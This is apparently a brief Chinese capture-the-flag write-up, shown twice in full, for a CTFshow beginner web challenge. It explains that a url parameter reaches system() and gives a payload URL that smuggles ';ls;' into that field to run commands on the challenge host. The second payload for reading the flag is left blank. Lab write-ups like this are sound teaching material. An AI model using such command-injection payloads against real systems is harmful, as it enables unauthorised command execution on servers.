CTFshow萌新赛-web签到
打开靶机
查看页面信息
可以看到有一个system函数
在Linux中可以使用“;”隔离不同的语句
payload如下
https://5105c8b6-83aa-4993-91bf-296eb5983ef2.chall.ctf.show/?url=5105c8b6-83aa-4993-91bf-296eb5983ef2.chall.ctf.show;ls;ping www
使用同样的方法查看flag文件内容
payload
成功拿到flag
打开靶机
查看页面信息
可以看到有一个system函数
在Linux中可以使用“;”隔离不同的语句
payload如下
https://5105c8b6-83aa-4993-91bf-296eb5983ef2.chall.ctf.show/?url=5105c8b6-83aa-4993-91bf-296eb5983ef2.chall.ctf.show;ls;ping www
使用同样的方法查看flag文件内容
payload
成功拿到flag
